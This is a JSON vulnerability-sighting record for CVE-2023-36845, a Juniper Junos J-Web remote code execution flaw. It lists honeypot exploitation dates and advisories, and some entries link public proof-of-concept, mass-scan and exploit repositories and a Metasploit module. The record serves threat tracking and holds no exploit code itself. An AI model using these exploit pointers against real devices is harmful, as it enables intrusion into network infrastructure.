{"vulnerability": "cve-2023-36845", "sightings": [{"uuid": "d9d8668c-fac3-4b38-be37-1b75da05bcad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-11-13T18:10:02.000000Z"}, {"uuid": "b03bd2b9-adf3-4840-9e50-4d094eefc2e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971917", "content": "", "creation_timestamp": "2024-12-24T20:35:37.262158Z"}, {"uuid": "eff47022-9592-4a26-9889-ca48ace3f964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "d36698dc-12d2-4d17-adde-e4ddd6fcdc76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:55.000000Z"}, {"uuid": "df046d82-19f9-46e3-a95e-104b83d1745d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2023-36845", "type": "seen", "source": "https://infosec.exchange/users/saltmyhash/statuses/114039171548967342", "content": "", "creation_timestamp": "2025-02-21T01:01:38.172799Z"}, {"uuid": "a9e76f56-905e-433e-95ea-e18c741ace3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:48.000000Z"}, {"uuid": "90653862-8377-4a3e-a078-82174fb77317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "4ee6031d-c2a2-489d-b979-e7a01eced4cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:01.000000Z"}, {"uuid": "a08d9e39-3fbd-41da-895f-a0a570937622", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-03)", "content": "", "creation_timestamp": "2025-08-03T00:00:00.000000Z"}, {"uuid": "165cb907-02bb-48c7-9f4c-8fca15e0e2dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-06)", "content": "", "creation_timestamp": "2025-11-06T00:00:00.000000Z"}, {"uuid": "62958a30-c711-4efd-88a9-974f23b2b150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb", "content": "", "creation_timestamp": "2023-09-29T16:38:38.000000Z"}, {"uuid": "0755a054-200a-4689-9f3f-25c217479cbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-03)", "content": "", "creation_timestamp": "2025-12-03T00:00:00.000000Z"}, {"uuid": "991b42e3-e0f9-488f-991e-e2b88e19db40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-04)", "content": "", "creation_timestamp": "2025-12-04T00:00:00.000000Z"}, {"uuid": "f4c652d2-760b-410f-ab4d-88862f5306f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-02)", "content": "", "creation_timestamp": "2026-03-02T00:00:00.000000Z"}, {"uuid": "0ad91175-4b9c-4834-b1ed-7f8eab221bab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_14/2023", "content": "", "creation_timestamp": "2023-08-20T06:53:11.000000Z"}, {"uuid": "9ab05277-dc3e-48a9-974c-42fafe75a596", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1113", "content": "", "creation_timestamp": "2023-09-20T04:00:00.000000Z"}, {"uuid": "23d8f2cd-75cc-49f8-9e6b-ec46769bcb2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "e8ae1397-97c3-4fd5-8fa6-411ab7c91bae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/322461f5-55e0-4813-bf73-a4a7ed19a557", "content": "", "creation_timestamp": "2026-02-02T12:26:46.992740Z"}, {"uuid": "08fc214f-6175-4740-9333-a1837e522944", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "Telegram/Du0MdwVxk-m_a0lPRgOSkwKDcmvhNbHj6kmNSaYCuL7u0_A", "content": "", "creation_timestamp": "2025-11-24T21:00:05.000000Z"}, {"uuid": "fc9a6895-e05c-447e-8822-7eb5ddb20eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "9e20dcf8-2d63-4d67-abc4-e3fdfaae17ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/cKure/11585", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Fileless Remote Code Execution on Juniper Firewalls - Blog - VulnCheck.\n\nhttps://vulncheck.com/blog/juniper-cve-2023-36845", "creation_timestamp": "2023-09-18T21:31:57.000000Z"}, {"uuid": "61b20b86-8efb-46d5-be3a-9a6175b928bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/cKure/11966", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Zero-Day: CVE-2023-36845 represents a notable PHP environment variable manipulation vulnerability that impacts Juniper SRX firewalls and EX switches. While Juniper has categorized this vulnerability as being of medium severity, in this article, we will elucidate how this singular vulnerability can be leveraged for remote, unauthenticated code execution.\n\nhttps://github.com/kljunowsky/CVE-2023-36845", "creation_timestamp": "2023-11-12T16:20:13.000000Z"}, {"uuid": "a82c5c3a-a483-49ab-a6ec-b112b6fa3f5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5244", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aMass check CVE-2023-36845 \nURL\uff1ahttps://github.com/zaenhaxor/CVE-2023-36845\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-29T03:17:29.000000Z"}, {"uuid": "6f7834df-12d2-4d9e-a8f2-ccc8088bb83b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5224", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aPython script to check if Juniper Firewalls are vulnerable to CVE-2023-36845 - RCE\nURL\uff1ahttps://github.com/kljunowsky/CVE-2023-36845\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-26T18:01:54.000000Z"}, {"uuid": "4675694a-9511-4456-adc8-076d707c31e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6610", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aJuniper - Remote Code Execution (CVE-2023-36845) PreAuth-RCE Exploits\nURL\uff1ahttps://github.com/imhunterand/CVE-2023-36845\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-02-15T20:20:54.000000Z"}, {"uuid": "5fbe36cb-ff2e-445d-a487-44c217e9006d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5709", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aJuniper Junos exploit for CVE-2023-36844 (or CVE-2023-36845)\nURL\uff1ahttps://github.com/realcitril/CVE-2023-36844\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-11-07T19:40:02.000000Z"}, {"uuid": "c56b6086-4665-4fe9-8dd9-7f7d55e837fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6152", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aproof of Concept and Vulnerability Detector for CVE-2023-36845\nURL\uff1ahttps://github.com/WhiteOwl-Pub/Juniper-PoC-CVE-2023-36845\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-12-12T16:15:12.000000Z"}, {"uuid": "410a08e4-3e81-44b3-9de4-4adf2688f150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6597", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2023-36845 \u0438 CVE-2023-36846 Juniper Junos OS J-Web RCE\nURL\uff1ahttps://github.com/iveresk/CVE-2023-36845-6-\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-02-13T15:03:46.000000Z"}, {"uuid": "56a83753-b7fc-46f3-90d9-3fae09782716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "https://t.me/itsec_news/3673", "content": "\u200b\u26a1\ufe0fJuniper \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043f\u043e\u0434 \u0443\u0434\u0430\u0440 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u042e\u0436\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0438 \u0438 \u0421\u0428\u0410\n\n\ud83d\udcac \u0410\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0437\u0430\u0449\u0438\u0442\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0421\u0428\u0410 CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u0444\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u044b\u0435 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0441\u0438\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 Juniper \u0432 \u0441\u0435\u0442\u044f\u0445. \u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u043e \u0437\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435\u043c \u0447\u0435\u0442\u044b\u0440\u0435\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u0434\u0430 (Remote Code Execution, RCE).\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u043a\u0430\u043a CVE-2023-36844, CVE-2023-36845, CVE-2023-36846 \u0438 CVE-2023-36847, \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435 J-Web Juniper. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Juniper \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0430 \u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u0434\u0435\u043b\u044e \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0441\u043b\u0443\u0436\u0431\u0430 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0443\u0433\u0440\u043e\u0437 ShadowServer \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043a\u043e\u043c\u0430\u043d\u0434\u0430 watchTowr Labs \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0438 (Proof-of-Concept, PoC) \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shadowserver, \u0431\u043e\u043b\u0435\u0435 10 000 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 Juniper, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 J-Web, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435, \u043f\u0440\u0438\u0447\u0435\u043c \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043d\u0438\u0445 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u044b \u0432 \u042e\u0436\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0435 (\u043e\u043a\u043e\u043b\u043e 3 000) \u0438 \u0421\u0428\u0410 (\u043e\u043a\u043e\u043b\u043e 1 300). \u042d\u0442\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u044c \u0443\u0433\u0440\u043e\u0437\u044b, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0434\u0430\u043d\u043d\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0438\u0433\u0440\u0430\u044e\u0442 \u043a\u043b\u044e\u0447\u0435\u0432\u0443\u044e \u0440\u043e\u043b\u044c \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435.\n\nCISA \u043f\u0440\u0438\u0437\u0432\u0430\u043b\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0441\u0440\u043e\u0447\u043d\u043e \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u043c\u0435\u0440\u044b, \u043e\u0431\u043d\u043e\u0432\u0438\u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 JunOS \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438\u043b\u0438, \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043a \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0443 J-Web. \u042d\u0442\u043e \u043f\u043e\u043c\u043e\u0436\u0435\u0442 \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0440\u0438\u0441\u043a\u0438 \u0430\u0442\u0430\u043a.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CISA \u0432\u043a\u043b\u044e\u0447\u0438\u043b\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Juniper \u0432 \u0441\u0432\u043e\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (Known Exploited Vulnerabilities, KEV), \u043e\u0431\u043e\u0437\u043d\u0430\u0447\u0438\u0432 \u0438\u0445 \u043a\u0430\u043a \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0440\u0438\u0441\u043a\u0438 \u0434\u043b\u044f \u0444\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f \u0438 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 \u0432\u0435\u043a\u0442\u043e\u0440\u044b \u0430\u0442\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u044b\u0435 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430 \u0442\u0435\u043f\u0435\u0440\u044c \u043e\u0431\u044f\u0437\u0430\u043d\u044b \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0442\u044c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 Juniper \u0432 \u0441\u0432\u043e\u0438\u0445 \u0441\u0435\u0442\u044f\u0445 \u0434\u043e 17 \u043d\u043e\u044f\u0431\u0440\u044f. \u0422\u0430\u043a\u0436\u0435 CISA \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u0432\u0441\u0435\u043c \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u043f\u0440\u0438\u0434\u0430\u0442\u044c \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2023-11-14T13:09:19.000000Z"}, {"uuid": "f2908461-bfc9-4abf-b2be-bedf5bfee324", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/Cyber_Watch_insider/88", "content": "https://vulncheck.com/blog/juniper-cve-2023-36845", "creation_timestamp": "2023-09-18T19:48:53.000000Z"}, {"uuid": "388c2e02-dd5f-467d-acec-50fa1eccaa0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "exploited", "source": "https://t.me/hackyourmom/6009", "content": "CISA \u0434\u043e\u0434\u0430\u043b\u0430 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0456 Juniper \u0434\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0443 \u0435\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u043e\u0432\u0430\u043d\u0438\u0445 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0435\u0439.\n\n\u0410\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u044c\u043a\u0435 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u0437 \u043a\u0456\u0431\u0435\u0440\u0431\u0435\u0437\u043f\u0435\u043a\u0438 \u0442\u0430 \u0431\u0435\u0437\u043f\u0435\u043a\u0438 \u0456\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0438 (CISA) \u0432\u043a\u043b\u044e\u0447\u0438\u043b\u043e \u0434\u043e \u0441\u0432\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0443 KEV \u0448\u0456\u0441\u0442\u044c \u043d\u043e\u0432\u0438\u0445 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0435\u0439, \u0437 \u044f\u043a\u0438\u0445 \u043f'\u044f\u0442\u044c \u0441\u0442\u043e\u0441\u0443\u044e\u0442\u044c\u0441\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u0439\u043d\u043e\u0457 \u0441\u0438\u0441\u0442\u0435\u043c\u0438 Juniper Junos OS, \u0430 \u043e\u0434\u043d\u0430 - \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043d\u043e\u0433\u043e \u0437\u0430\u0431\u0435\u0437\u043f\u0435\u0447\u0435\u043d\u043d\u044f \u0434\u043b\u044f \u0406\u0422-\u043f\u0456\u0434\u0442\u0440\u0438\u043c\u043a\u0438 \u043f\u0456\u0434 \u043d\u0430\u0437\u0432\u043e\u044e SysAid.\n\n\u0421\u0435\u0440\u0435\u0434 \u0434\u043e\u0434\u0430\u043d\u0438\u0445 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0435\u0439:\nCVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847, CVE-2023-36851: \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0456 \u0432 Juniper Junos OS \u0441\u0435\u0440\u0456\u0439 EX \u0456 SRX, \u043f\u043e\u0432'\u044f\u0437\u0430\u043d\u0456 \u0437 \u043d\u0435\u0434\u043e\u043b\u0456\u043a\u0430\u043c\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0456\u043a\u0430\u0446\u0456\u0457 \u0442\u0430 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u044f\u043c\u0438 \u0432 PHP.\nCVE-2023-47246: \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u0456\u0441\u0442\u044c \u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0456 SysAid, \u043f\u043e\u0432'\u044f\u0437\u0430\u043d\u0430 \u0437 \u043e\u0431\u0445\u0456\u0434\u043e\u043c \u0448\u043b\u044f\u0445\u0443.\n\n\u0417\u0430 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u0454\u044e Juniper SIRT, 